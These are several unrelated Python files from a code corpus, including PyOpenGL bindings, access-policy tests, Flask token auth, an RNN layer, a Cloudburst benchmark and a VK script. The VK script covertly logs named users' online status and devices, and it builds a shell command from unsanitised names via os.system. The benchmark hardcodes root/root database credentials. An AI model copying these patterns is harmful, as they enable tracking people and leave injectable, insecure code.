parser.set_defaults(runner=run)
parser.add_argument(
"--metadata", "-m",
type=str,
required=True,
help="tool metadata"
)
parser.add_argument(
"--imageId", "-i",
type=str,
help="docker image id"
)
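# Hedged usage sketch (editor's addition): how this sub-command module parses its
# own flags. host/port/authToken are expected to come from a parent parser
# elsewhere in ccc_client, so only the local flags are exercised here.
def _parser_sketch():
    args = parser.parse_args(["--metadata", '{"description": "aligner"}', "--imageId", "abc123"])
    assert args.imageId == "abc123"
    return args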
|
StarcoderdataPython
|
11267489
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# main.py
# (c) <NAME> 2018
# <EMAIL>
from requests_html import HTMLSession
import sys
import time
import os
import configparser
config_name = "Settings"
vkapiuri_tag = "VKAPIURI"
accesstoken_tag = "ACCESSTOKEN"
version_tag = "VKAPIVERSION"
def check_user(ids):
TAG = "user checker"
user_ids = ",".join(str(e) for e in ids)
get_link = vk_api_link + "users.get?user_ids=" + str(user_ids) + "&fields=sex,online,last_seen&access_token=" + \
access_token + "&v=" + v + "&lang=ru"
ms = int(round(time.time() * 1000))
content = HTMLSession().get(get_link)
json = content.json()
countMillis = int(round(time.time() * 1000)) - ms
sex = [["была в сети", "был в сети"], ["в сети", "в сети"]]
device = ["с мобильного", "с iPhone", "с iPad", "с Android", "с Windows Phone", "с Windows 10", "с ПК", "с VK Mobile"]
log("br", "")
title_mes = ""
user_online = 0
for i in range(num_of_user):
userinfo = json["response"][i]
userstat = userinfo["last_seen"]
nameofuser = userinfo["first_name"] + " " + userinfo["last_name"]
ms_time = time.gmtime(int(userstat["time"]) + 10800)
log("online", nameofuser + " " + sex[int(userinfo["online"])][int(userinfo["sex"]) - 1] +
" " + device[int(userstat["platform"])-1] + ", " + time.strftime("%d %b %Y %H:%M:%S", ms_time))
if int(userinfo["online"]):
user_online += 1
if len(users) > 1:
title_mes = str(num_of_user) + " наблюдаемых / " + str(user_online) + " в сети"
else:
title_mes = nameofuser + " " + sex[int(userinfo["online"])][int(userinfo["sex"]) - 1] + \
" " + device[int(userstat["platform"])-1] + ", " + time.strftime("%H:%M:%S", ms_time)
log("br", "")
title_ch(title_mes)
log(TAG, "Задержка " + str(countMillis) + " мс.")
def title_ch(title_string):
from os import system
system("title " + title_string)
def log(tag, message):
now = time.localtime()
log_to_file = open(path + str(now.tm_mday) + ".log", "a")
nowtime = time.strftime("%d %b %Y %H:%M:%S", now)
if str(tag) == "i":
text_return = "\n" + str(nowtime) + ": " + str(message) + "\n"
elif str(tag) == "br":
text_return = ""
else:
text_return = str(nowtime) + ": " + str(tag) + ": " + str(message)
print(text_return)
log_to_file.write(text_return + "\n")
log_to_file.close()
def createConfig(path):
config = configparser.ConfigParser()
config.add_section(config_name)
config.set(config_name, vkapiuri_tag, "https://api.vk.com/method/")
config.set(config_name, accesstoken_tag, "<KEY>")
config.set(config_name, version_tag, "5.80")
with open(path, "w") as config_file:
config.write(config_file)
def readConfig(path, param):
if not os.path.exists(path):
createConfig(path)
config = configparser.ConfigParser()
config.read(path)
return config.get(config_name, param)
if __name__ == "__main__":
TAG = "main"
startup = time.time()
runtimes = 0
print("\n\tVKOC ver.1.1\t")
vk_api_link = str(readConfig("./config.ini", vkapiuri_tag))
access_token = str(readConfig("./config.ini", accesstoken_tag))
v = str(readConfig("./config.ini", version_tag))
print("\nИнициализация успешна.\nVK API URI = " + vk_api_link + "\nACCESS TOKEN = " + access_token +
"\nVK API VERSION = " + v + "\n")
num_of_user = 0
users = []
tdelay = 1
    if len(sys.argv) >= 3:  # need both the user list and the timer delay on the command line
users = str(sys.argv[1]).split(",")
num_of_user = len(users)
tdelay = sys.argv[2]
else:
num_of_user = int(input("Колличество отслеживаемых пользователей: "))
users = []
for i in range(num_of_user):
users.append(input("ID пользователя " + str(i + 1) + ": "))
tdelay = input("Введите задержку таймера (мин): ")
users.sort()
timer_delay = tdelay
now = time.localtime()
if now.tm_mon < 10:
month = "0" + str(now.tm_mon)
else:
month = str(now.tm_mon)
path = None
if len(users) > 1:
users_s = "; ".join(str(e) for e in users)
path = "logs/" + "few users/" + users_s + "/" + str(now.tm_year) + month + "/"
else:
path = "logs/" + str(users[0]) + "/" + str(now.tm_year) + month + "/"
if not os.path.exists(path):
os.makedirs(path)
while True:
runtimes += 1
log("br", "")
log(TAG, "### ###")
log(TAG, "Программный цикл: " + str(runtimes))
try:
            if not users:  # nothing to monitor
break
else:
check_user(users)
timer_delay = tdelay
except Exception as e:
log("error", "Произошла ошибка: " + str(e))
timer_delay = 1
uptime = round(time.time() * 1000) - round(startup * 1000)
log(TAG, "Повтор команды через " + str(timer_delay) + " минут.")
log(TAG, "Uptime: " + str(uptime) + " ms")
time.sleep(60 * float(timer_delay))
|
StarcoderdataPython
|
3345617
|
<filename>OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/GL/OES/read_format.py
'''OpenGL extension OES.read_format
This module customises the behaviour of the
OpenGL.raw.GL.OES.read_format to provide a more
Python-friendly API
Overview (from the spec)
This extension provides the capability to query an OpenGL
implementation for a preferred type and format combination
for use with reading the color buffer with the ReadPixels
command. The purpose is to enable embedded implementations
to support a greatly reduced set of type/format combinations
and provide a mechanism for applications to determine which
implementation-specific combination is supported.
The preferred type and format combination returned may depend
on the read surface bound to the current GL context.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/OES/read_format.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.OES.read_format import *
from OpenGL.raw.GL.OES.read_format import _EXTENSION_NAME
def glInitReadFormatOES():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
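# Hedged usage sketch (editor's addition): the intended query pattern once a GL
# context is current. The GL_IMPLEMENTATION_COLOR_READ_* constants are assumed to
# be re-exported by the star import of the raw extension module above.
def _preferred_read_format_sketch():
    from OpenGL.GL import glGetIntegerv
    if not glInitReadFormatOES():
        return None
    preferred_format = glGetIntegerv(GL_IMPLEMENTATION_COLOR_READ_FORMAT_OES)
    preferred_type = glGetIntegerv(GL_IMPLEMENTATION_COLOR_READ_TYPE_OES)
    return preferred_format, preferred_type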
|
StarcoderdataPython
|
3476255
|
<filename>eslearn/utils/multiprocessing_test.py
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 4 22:41:05 2018
@author: lenovo
"""
from concurrent.futures import ThreadPoolExecutor
import time
# The "times" argument simulates how long the network request takes
def get_html(times):
time.sleep(times)
print("get page {}s finished\n".format(times))
return times
with ThreadPoolExecutor(2) as executor:
#executor = ThreadPoolExecutor(max_workers=2)
    # submit() hands the callable to the thread pool and returns a Future immediately, without blocking
task1 = executor.submit(get_html, (0.5))
task2 = executor.submit(get_html, (0.5))
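# Hedged follow-up sketch (editor's addition): result() blocks until a submitted
# call finishes, and as_completed() yields futures in completion order.
def _collect_results_sketch():
    from concurrent.futures import as_completed
    with ThreadPoolExecutor(2) as pool:
        futures = [pool.submit(get_html, t) for t in (0.3, 0.1)]
        return [f.result() for f in as_completed(futures)]  # likely [0.1, 0.3]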
|
StarcoderdataPython
|
3496819
|
<gh_stars>1-10
# Always prefer setuptools over distutils
from setuptools import setup
setup(
name="mattermostwrapper",
packages=['mattermostwrapper'],
version="2.2",
author="<NAME>",
author_email="<EMAIL>",
url='https://github.com/btotharye/mattermostwrapper.git',
download_url='https://github.com/btotharye/mattermostwrapper/archive/2.2.tar.gz',
description=("A mattermost api v4 wrapper to interact with api"),
license="MIT",
install_requires=[
'requests',
],
classifiers=[],
)
|
StarcoderdataPython
|
1707353
|
<gh_stars>10-100
import unittest
from policytool import policyutil
class TestValidatePolicy(unittest.TestCase):
def test_validate_policy_with_ok_input(self):
policy = {
"service": "service_tag",
"name": "test_policy_rule",
"policyType": 0,
"description": "Test rule",
"resources": {
"tag": {
"values": [
"visible"
],
"isExcludes": False,
"isRecursive": True
}
},
"policyItems": [{
"accesses": [{
"type": "hive:select",
"isAllowed": True
}, {
"type": "hive:read",
"isAllowed": True
}],
"users": ["myuser"],
"delegateAdmin": False
}]
}
policyutil.validate_policy(policy)
def test_validate_policy_with_deny_policy_items(self):
policy = {
"service": "service_tag",
"name": "test_policy_rule",
"policyType": 0,
"description": "Test rule",
"resources": {
"tag": {
"values": [
"visible"
],
"isExcludes": False,
"isRecursive": True
}
},
"denyPolicyItems": [{
"accesses": [{
"type": "hive:select",
"isAllowed": True
}, {
"type": "hive:read",
"isAllowed": True
}],
"users": ["myuser"],
"delegateAdmin": False
}]
}
policyutil.validate_policy(policy)
def test_validate_policy_with_missing_name(self):
policy = {
"service": "service_tag",
"policyType": 0,
"description": "Test rule",
"resources": {
"tag": {
"values": [
"visible"
],
"isExcludes": False,
"isRecursive": True
}
},
"policyItems": [{
"accesses": [{
"type": "hive:select",
"isAllowed": True
}, {
"type": "hive:read",
"isAllowed": True
}],
"users": ["myuser"],
"delegateAdmin": False
}]
}
with self.assertRaises(AttributeError):
policyutil.validate_policy(policy)
self.fail("Validate policy did not raise exception for missing name.")
def test_validate_policy_with_missing_policytype(self):
policy = {
"service": "service_tag",
"name": "test_policy_rule",
"description": "Test rule",
"resources": {
"tag": {
"values": [
"visible"
],
"isExcludes": False,
"isRecursive": True
}
},
"policyItems": [{
"accesses": [{
"type": "hive:select",
"isAllowed": True
}, {
"type": "hive:read",
"isAllowed": True
}],
"users": ["myuser"],
"delegateAdmin": False
}]
}
with self.assertRaises(AttributeError):
policyutil.validate_policy(policy)
self.fail("Validate policy did not raise exception for missing policyType.")
def test_validate_policy_with_missing_resources(self):
policy = {
"service": "service_tag",
"name": "test_policy_rule",
"policyType": 0,
"description": "Test rule",
"policyItems": [{
"accesses": [{
"type": "hive:select",
"isAllowed": True
}, {
"type": "hive:read",
"isAllowed": True
}],
"users": ["myuser"],
"delegateAdmin": False
}]
}
with self.assertRaises(AttributeError):
policyutil.validate_policy(policy)
self.fail("Validate policy did not raise exception for missing resources.")
def test_validate_policy_with_missing_policyitems_and_policytype_0(self):
policy = {
"service": "service_tag",
"name": "test_policy_rule",
"policyType": 0,
"description": "Test rule",
"resources": {
"tag": {
"values": [
"visible"
],
"isExcludes": False,
"isRecursive": True
}
}
}
with self.assertRaises(AttributeError):
policyutil.validate_policy(policy)
self.fail("Validate policy did not raise exception for missing policyItems.")
def test_validate_policy_with_missing_policyitems_and_policytype_not_0(self):
policy = {
"service": "service_tag",
"name": "test_policy_rule",
"policyType": 1,
"description": "Test rule",
"resources": {
"tag": {
"values": [
"visible"
],
"isExcludes": False,
"isRecursive": True
}
}
}
policyutil.validate_policy(policy)
class TestResourceType(unittest.TestCase):
def test_get_resource_type_for_tag(self):
policy = {
"policyType": 0,
"resources": {
"tag": {
"values": [
"visible"
],
"isExcludes": False,
"isRecursive": True
}
}
}
self.assertEqual("tag", policyutil.get_resource_type(policy))
def test_get_resource_type_for_database(self):
policy = {
"policyType": 0,
"resources": {
"database": {
"values": [
"my_db"
]
},
"column": {
"values": [
"*"
]
},
"table": {
"values": [
"*"
]
}
}
}
self.assertEqual("database", policyutil.get_resource_type(policy))
def test_get_resource_type_for_path(self):
policy = {
"policyType": 0,
"resources": {
"path": {
"values": [
"/my/path"
]
}
},
}
self.assertEqual("path", policyutil.get_resource_type(policy))
def test_get_resource_type_when_not_found_must_return_unknown(self):
policy = {
"policyType": 0,
"resources": {}
}
self.assertEqual("unknown", policyutil.get_resource_type(policy))
def test_get_resource_type_when_not_providing_policytype_0_must_fail(self):
policy = {
"name": "foo",
"policyType": 1,
"resources": {
"path": {
"values": [
"/my/path"
]
}
},
}
with self.assertRaises(AttributeError) as e:
policyutil.get_resource_type(policy)
self.fail("get_resource_type did not raise exception for missing policyItems.")
self.assertEqual(
"PolicyType must be 0 to support option expandHiveResourceToHdfs. Policy: foo",
            str(e.exception))  # Python 3 exceptions have no .message attribute
class TestExtendTagPolicyWithHdfs(unittest.TestCase):
def test_read_only_access(self):
policy_input = {
"policyType": 0,
"resources": {
"tag": {}
},
"policyItems": [{
"accesses": [{
"type": "hive:select",
"isAllowed": True
}, {
"type": "hive:read",
"isAllowed": True
}],
"users": ["myuser"],
"delegateAdmin": False
}]
}
policy_expected = {
"policyItems": [{
"accesses": [{
"isAllowed": True,
"type": "hive:select"
}, {
"isAllowed": True,
"type": "hive:read"
}, {
"isAllowed": True,
"type": "hdfs:read"
}, {
"isAllowed": True,
"type": "hdfs:execute"
}],
"delegateAdmin": False,
"users": ["myuser"]
}],
"policyType": 0,
"resources": {
"tag": {}
}
}
self.assertEqual(policy_expected, policyutil.extend_tag_policy_with_hdfs(policy_input))
def test_write_access(self):
policy_input = {
"policyType": 0,
"resources": {
"tag": {}
},
"policyItems": [{
"accesses": [{
"type": "hive:insert",
"isAllowed": True
}],
"users": ["myuser"],
"delegateAdmin": False
}]
}
policy_expected = {
"policyItems": [{
"accesses": [{
"isAllowed": True,
"type": "hive:insert"
}, {
"isAllowed": True,
"type": "hdfs:write"
}],
"delegateAdmin": False,
"users": ["myuser"]
}],
"policyType": 0,
"resources": {
"tag": {}
}
}
self.assertEqual(policy_expected, policyutil.extend_tag_policy_with_hdfs(policy_input))
def test_deny_write_access(self):
policy_input = {
"policyType": 0,
"resources": {
"tag": {}
},
"denyPolicyItems": [{
"accesses": [{
"type": "hive:insert",
"isAllowed": True
}],
"users": ["myuser"],
"delegateAdmin": False
}]
}
policy_expected = {
"denyPolicyItems": [{
"accesses": [{
"isAllowed": True,
"type": "hive:insert"
}, {
"isAllowed": True,
"type": "hdfs:write"
}],
"delegateAdmin": False,
"users": ["myuser"]
}],
"policyType": 0,
"resources": {
"tag": {}
}
}
self.assertEqual(policy_expected, policyutil.extend_tag_policy_with_hdfs(policy_input))
|
StarcoderdataPython
|
6403399
|
from .. import auth, models
from flask import Blueprint, g, make_response, render_template
import json
login_auth = Blueprint('login_auth', __name__)
# This blueprint handles RESTful API authentication and token generation.
@auth.error_handler
def unauthorized():
return make_response("""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>404 Not Found</title>\n<h1>Not Found</h1>\n<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>\n""", 404)
@auth.verify_password
def verify_password(username_or_token, password):
"Verifies credientials."
# first try to authenticate by token
user = models.User.verify_auth_token(username_or_token)
if not user:
# try to authenticate with username/password
user = models.User.query.filter_by(username=username_or_token).first()
if not user or not user.verify_password(password):
return False
g.user = user
return True
@login_auth.route('/get-auth-token')
@auth.login_required
def get_auth_token():
"""
Generates an authentication token for 600 seconds.
:returns: json
"""
token = g.user.generate_auth_token(600)
return json.dumps({'token': token.decode('ascii'), 'duration': 600})
@login_auth.route('/resource')
@auth.login_required
def get_resource():
return json.dumps({'data': 'Hello, %s!' % g.user.username}), 200
@login_auth.route('/sample')
def get_sample():
return json.dumps(dict(msg='Hello'))
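# Hedged client-side sketch (editor's addition): fetch a token with basic auth,
# then reuse it as the username for later calls (verify_password above accepts a
# valid token regardless of the password field). The base URL and credentials are
# illustrative, and the sketch assumes the blueprint is registered without a URL prefix.
def _token_flow_sketch():
    import requests
    base = "http://localhost:5000"
    token = requests.get(base + "/get-auth-token", auth=("alice", "secret")).json()["token"]
    return requests.get(base + "/resource", auth=(token, "unused")).json()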
|
StarcoderdataPython
|
3422575
|
# -*- encoding: utf-8 -*-
"""
:copyright: 2017-2020 H2O.ai, Inc.
:license: Apache License Version 2.0 (see LICENSE for details)
"""
def load_pkl(name):
"""Load xgboost model from pickle and perform conversion from version
0.90 if necessary.
:return:
XGBoost model
"""
import pickle
import xgboost
with open(name, 'rb') as f:
try:
model = pickle.load(f)
return model
except xgboost.core.XGBoostError as e:
if "Check failed: header == serialisation_header_" in str(e):
import xgboost_prev # pylint: disable=unused-import
import tempfile
class Unpickler(pickle.Unpickler):
def find_class(self, module, name):
if module.startswith("xgboost"):
return pickle.Unpickler.find_class(
self, module.replace(
"xgboost", "xgboost_prev"),
name)
return pickle.Unpickler.find_class(self, module, name)
f.seek(0)
model = Unpickler(f).load()
temp_file = tempfile.NamedTemporaryFile(
prefix='xgboost_migration', suffix='.model')
model.save_model(temp_file.name)
migrated_model = xgboost.XGBModel()
migrated_model.load_model(temp_file.name)
return migrated_model
raise
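# Hedged usage sketch (editor's addition): load_pkl is transparent to callers --
# pickles written by xgboost 0.90 or by a current release both come back as a
# usable model object. The file name and feature matrix are illustrative.
def _load_pkl_sketch(feature_matrix):
    model = load_pkl("model_from_0.90.pkl")
    return model.predict(feature_matrix)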
|
StarcoderdataPython
|
6668214
|
<reponame>fortminors/msai-python
from django import forms
class LeadForm(forms.Form):
name = forms.CharField(label='Your name', max_length=100)
email = forms.EmailField(label='Email', max_length=100)
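# Hedged usage sketch (editor's addition): binding data to the form and calling
# is_valid() populates cleaned_data. The sample payload is illustrative and the
# sketch assumes Django settings are already configured.
def _lead_form_sketch():
    form = LeadForm(data={"name": "Ada Lovelace", "email": "[email protected]"})
    assert form.is_valid()
    return form.cleaned_data["email"]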
|
StarcoderdataPython
|
3424194
|
# Copyright 2020 LMNT, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Layer Normalized Independently Recurrent Neural Network"""
import pkg_resources
import tensorflow as tf
from tensorflow.compat import v1
from tensorflow.compat.v1.nn import rnn_cell
from .base_rnn import BaseRNN
from .weight_config import WeightConfig
__all__ = [
'LayerNormIndRNN'
]
LIB = tf.load_op_library(pkg_resources.resource_filename(__name__, 'libhaste_tf.so'))
@tf.RegisterGradient("HasteLayerNormIndrnn")
def layer_norm_indrnn_gradient(op, *grads):
training = op.get_attr('training')
if not training:
raise ValueError(('LayerNormIndRNN can only compute gradients if `training=True` was specified '
'during the forward pass.\nFailed op: {}').format(op.name))
# Extract inputs and outputs from the op.
x = op.inputs[0]
W = op.inputs[1]
u = op.inputs[2]
b = op.inputs[3]
gamma = op.inputs[4]
zoneout_mask = op.inputs[5]
h = op.outputs[0]
cache = op.outputs[1]
# Pre-transpose matrices for better performance.
x = tf.transpose(x, [2, 0, 1])
W = tf.transpose(W, [1, 0])
grads = LIB.haste_layer_norm_indrnn_grad(x, W, u, b, gamma, zoneout_mask, h, cache, grads[0])
return [*grads, None]
def _get_initializer(initializer):
if not isinstance(initializer, dict):
return initializer
if 'uniform' in initializer:
value = initializer['uniform']
return v1.initializers.random_uniform(-value, value)
if 'normal' in initializer:
value = initializer['normal']
return v1.initializers.truncated_normal(stddev=value)
raise ValueError(f'Unknown initializer {initializer}')
class LayerNormIndRNNLayer(tf.Module):
def __init__(self,
num_units,
kernel_initializer=None,
recurrent_initializer=None,
bias_initializer=None,
kernel_transform=None,
recurrent_transform=None,
bias_transform=None,
zoneout=0.0,
dtype=None,
name=None):
super().__init__(name)
self.realname = name
self.num_units = num_units
identity = lambda x: x
self.kernel_config = WeightConfig(v1.initializers.glorot_uniform(), None, identity)
self.recurrent_config = WeightConfig(v1.initializers.random_uniform(-0.5, 0.5), None, identity)
self.bias_config = WeightConfig(v1.initializers.zeros(), None, identity)
self.kernel_config.override(_get_initializer(kernel_initializer), None, kernel_transform)
self.recurrent_config.override(_get_initializer(recurrent_initializer), None, recurrent_transform)
self.bias_config.override(_get_initializer(bias_initializer), None, bias_transform)
self.zoneout = zoneout
self.dtype = dtype or tf.float32
self.kernel = None
self.recurrent_scale = None
self.bias = None
self.gamma = None
self.recurrent_bias = None
self.built = False
def build(self, shape):
if self.built:
return
num_units = self.num_units
input_size = int(shape[-1])
kernel_shape = tf.TensorShape([input_size, num_units])
recurrent_shape = tf.TensorShape([num_units])
bias_shape = tf.TensorShape([num_units])
kernel_weights = self.kernel_config.initializer(kernel_shape, dtype=self.dtype)
recurrent_weights = self.recurrent_config.initializer(recurrent_shape, dtype=self.dtype)
biases = self.bias_config.initializer(bias_shape)
with self.name_scope, v1.variable_scope(self.realname, 'indrnn_cell'):
self.kernel = v1.get_variable('kernel', initializer=kernel_weights)
self.recurrent_scale = v1.get_variable('recurrent_scale', initializer=recurrent_weights)
self.bias = v1.get_variable('bias', initializer=biases)
self.gamma = v1.get_variable('gamma', shape=[2, self.num_units], initializer=v1.initializers.ones())
self.built = True
def get_weights(self):
return {
'kernel': self.kernel_config.transform(self.kernel),
'recurrent_scale': self.recurrent_config.transform(self.recurrent_scale),
'bias': self.bias_config.transform(self.bias),
'gamma': self.gamma,
}
def __call__(self, inputs, sequence_length, training):
self.build(inputs.shape)
shape = tf.shape(inputs)
time_steps = shape[0]
batch_size = shape[1]
# Use an empty zoneout mask if no zoneout is going to be applied.
# Sadly, we can't pass `None` to the op but at least we won't be wasting
# memory or bandwidth on this tensor.
zoneout_mask = tf.zeros([0, 0, 0], dtype=self.dtype)
if self.zoneout:
zoneout_mask = 1.0 - self.zoneout
zoneout_mask += tf.random.uniform([time_steps, batch_size, self.num_units], dtype=self.dtype)
zoneout_mask = tf.floor(zoneout_mask)
weights = self.get_weights()
result, _ = LIB.haste_layer_norm_indrnn(
inputs,
weights['kernel'],
weights['recurrent_scale'],
weights['bias'],
weights['gamma'],
zoneout_mask,
training=training,
zoneout_prob=self.zoneout)
if sequence_length is not None:
# 0-indexed tensors, so length-1.
indices = sequence_length
indices = tf.stack([indices, tf.range(batch_size, dtype=sequence_length.dtype)], axis=-1)
state = tf.gather_nd(result, indices)
else:
state = result[-1]
return result[1:], state
class LayerNormIndRNN(BaseRNN):
"""
Layer Normalized Independently Recurrent Neural Network layer.
This IndRNN layer applies layer normalization to the input activations of a
standard IndRNN. The implementation is fused and GPU-accelerated.
This layer has built-in support for Zoneout regularization.
"""
def __init__(self, num_units, direction='unidirectional', **kwargs):
"""
Initialize the parameters of the IndRNN layer.
Arguments:
num_units: int, the number of units in the IndRNN cell.
direction: string, 'unidirectional' or 'bidirectional'.
**kwargs: Dict, keyword arguments (see below).
Keyword Arguments:
kernel_initializer: (optional) the initializer to use for the input
matrix weights. Defaults to `glorot_uniform`.
recurrent_initializer: (optional) the initializer to use for the
recurrent scale weights. Defaults to uniform random in [-0.5, 0.5].
Note that this initialization scheme is different than in the original
authors' implementation. See https://github.com/lmnt-com/haste/issues/7
for details.
bias_initializer: (optional) the initializer to use for the bias vector.
Defaults to `zeros`.
kernel_transform: (optional) a function with signature
`(kernel: Tensor) -> Tensor` that transforms the kernel before it is
used. Defaults to the identity function.
recurrent_transform: (optional) a function with signature
`(recurrent_scale: Tensor) -> Tensor` that transforms the recurrent
scale vector before it is used. Defaults to the identity function.
bias_transform: (optional) a function with signature
`(bias: Tensor) -> Tensor` that transforms the bias before it is used.
Defaults to the identity function.
zoneout: (optional) float, sets the zoneout rate for Zoneout
regularization. Defaults to 0.
dtype: (optional) the data type for this layer. Defaults to `tf.float32`.
name: (optional) string, the name for this layer.
"""
super().__init__(LayerNormIndRNNLayer, num_units, direction, 'indrnn_cell', **kwargs)
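# Hedged usage sketch (editor's addition): the call interface is inherited from
# BaseRNN (defined in .base_rnn, not shown in this file), so the keyword names
# below are assumptions. Inputs follow the time-major [time, batch, features]
# convention used by the layer implementation above.
def _layer_norm_indrnn_sketch():
    x = tf.random.normal([50, 8, 128])                   # [time, batch, features]
    rnn = LayerNormIndRNN(num_units=256, zoneout=0.05)
    output, state = rnn(x, training=True)                # assumed BaseRNN signature
    return output, state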
|
StarcoderdataPython
|
11367370
|
# Copyright 2019 U.C. Berkeley RISE Lab
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modifications copyright (C) 2021 <NAME>, <NAME>
import logging
import os
import sys
import time
from datetime import datetime
import cloudpickle as cp
from cloudburst.shared.reference import CloudburstReference
from cloudburst.server.benchmarks.ZipfGenerator import ZipfGenerator
from cloudburst.shared.proto.cloudburst_pb2 import CloudburstError
from cloudburst.server.benchmarks import utils
from cloudburst.shared.serializer import Serializer
from cloudburst.shared.proto.cloudburst_pb2 import (
Continuation,
DagTrigger,
FunctionCall,
NORMAL, MULTI, # Cloudburst's consistency modes,
EXECUTION_ERROR, FUNC_NOT_FOUND, # Cloudburst's error types
MULTIEXEC # Cloudburst's execution types
)
from anna.lattices import WrenLattice
import pymongo
def getTime():
return datetime.now().timestamp() * 1000
def func(cloudburst, futureReads, *argv):
next_read = []
keys = futureReads.pop(0)
for key in keys:
next_read.append(CloudburstReference(key, True))
return (futureReads, *next_read)
def sink(cloudburst, futureReads, *argv):
next_read = []
keys = futureReads.pop(0)
for key in keys:
next_read.append(CloudburstReference(key, True))
return 1
def func_parallel_test(cloudburst, x):
return x*2
def func_parallel_sink(cloudburst, x, y):
return x+y
def run(cloudburst_client, num_requests, create, redis, dag_name, db_size, tx_size, dag_size, zipf, warmup):
myclient = pymongo.MongoClient("mongodb://%s:%[email protected]:27017/" % ('root', 'root'))
mydb = myclient["mydatabase"]
mycol = mydb[dag_name]
if create:
serializer = Serializer()
functions = []
last = ""
connections = []
for i in range(dag_size-1):
functions.append('func' + str(i))
cloudburst_client.register(func, 'func' + str(i))
if (last != ""):
connections.append((last, 'func' + str(i)))
last = 'func' + str(i)
functions.append('write')
cloudburst_client.register(sink, 'write')
if (last != ""):
connections.append((last, 'write'))
time.sleep(20)
flag = True
while flag:
try:
success, error = cloudburst_client.register_dag(dag_name, functions, connections)
flag = False
except:
continue
keys = []
object = serializer.dump_lattice(1, WrenLattice)
for i in range(db_size + 1):
keys.append("k" + str(i))
if i % 1000 == 0:
cloudburst_client.kvs_client.put(keys, [object] * 1000)
keys = []
pass
if len(keys) != 0:
cloudburst_client.kvs_client.put(keys, [object] * len(keys))
mycol.insert({"operation": "create", "dag_name": dag_name, "result" : success, "error":error, "db_size": db_size, "tx_size": tx_size, "dag_size": dag_size, "zipf" : zipf})
return [], [], [], 0
elif warmup:
logging.info("Warming up")
warmup_keys = 10000
requests = []
tx_size = 100
for i in range(warmup_keys // tx_size):
keys_to_read = []
ref_to_key = []
for j in range(tx_size):
keys_to_read.append(CloudburstReference("k" + str(i * tx_size + j), True))
for k in range(0, dag_size):
next_request = []
for m in range(tx_size):
next_request.append("k" + str((i * tx_size + k * tx_size + m) % warmup_keys))
ref_to_key.append(next_request)
arg_map = {'func0': [ref_to_key, *keys_to_read]}
requests.append(arg_map)
total_time = []
epoch_req_count = 0
epoch_latencies = []
epoch_start = getTime()
epoch = 0
for request in requests:
start = getTime()
flag = True
while flag:
try:
res = cloudburst_client.call_dag(dag_name, request, consistency=MULTI, direct_response=True)
flag = False
except Exception as e:
logging.info(e)
continue
end = getTime()
if res is not None:
epoch_req_count += 1
total_time += [end - start]
epoch_latencies += [end - start]
epoch_end = getTime()
if epoch_end - epoch_start > 10:
if redis:
logging.info("Have redis")
redis.publish("result", cp.dumps((epoch_req_count, epoch_latencies)))
logging.info('EPOCH %d THROUGHPUT: %.2f' %
(epoch, (epoch_req_count / 10)))
out = utils.print_latency_stats(epoch_latencies,
'EPOCH %d E2E' % epoch, True)
epoch += 1
epoch_req_count = 0
epoch_latencies.clear()
epoch_start = getTime()
out = utils.print_latency_stats(total_time, 'E2E', True)
mycol.insert(
{"operation": "finish", "dag_name": dag_name, "result": out, "error": None, "db_size": db_size,
"tx_size": tx_size, "dag_size": dag_size, "zipf": zipf})
return total_time, [], [], 0
else:
logging.info("Generating requests")
logging.info("DB Size: %s zipf: %s" % (db_size, zipf))
logging.info("zipf_" + str(zipf) + "_" + str(db_size) + ".json")
logging.info("Current path: %s" % os.getcwd())
zipfGenerator = ZipfGenerator(db_size, zipf)
logging.info("zipf generator created")
next_read = []
keys = set()
while len(keys) < tx_size:
keys.add("k" + str(zipfGenerator.next()))
for key in keys:
next_read.append(CloudburstReference(key, True))
total_time = []
epoch_req_count = 0
epoch_latencies = []
epoch_start = getTime()
epoch = 0
requests = []
for _ in range(num_requests):
next_read = []
keys = set()
output_key = "k" + str(zipfGenerator.next())
futureReads = []
while len(keys) < tx_size:
keys.add("k" + str(zipfGenerator.next()))
for key in keys:
next_read.append(CloudburstReference(key, True))
for i in range(dag_size):
f_read = []
keys = set()
while len(keys) < tx_size:
keys.add("k" + str(zipfGenerator.next()))
futureReads.append(keys)
arg_map = {'func0': [futureReads, *next_read]}
requests.append(arg_map)
''' RUN DAG '''
total_time = []
epoch_req_count = 0
epoch_latencies = []
logging.info("Starting requests")
epoch_start = getTime()
epoch = 0
for request in requests:
output_key = "k" + str(zipfGenerator.next())
start = getTime()
flag = True
while flag:
try:
res = cloudburst_client.call_dag(dag_name, request, consistency=MULTI, output_key=output_key, direct_response=True)
if (res == "abort"):
continue
flag = False
except Exception as e:
logging.info(e)
continue
end = getTime()
if res is not None:
epoch_req_count += 1
total_time += [end - start]
epoch_latencies += [end - start]
epoch_end = getTime()
if epoch_end - epoch_start > 10:
if redis:
logging.info("Have redis")
redis.publish("result",cp.dumps((epoch_req_count, epoch_latencies)))
logging.info('EPOCH %d THROUGHPUT: %.2f' %
(epoch, (epoch_req_count / 10)))
out = utils.print_latency_stats(epoch_latencies,
'EPOCH %d E2E' % epoch, True)
epoch += 1
epoch_req_count = 0
epoch_latencies.clear()
epoch_start = getTime()
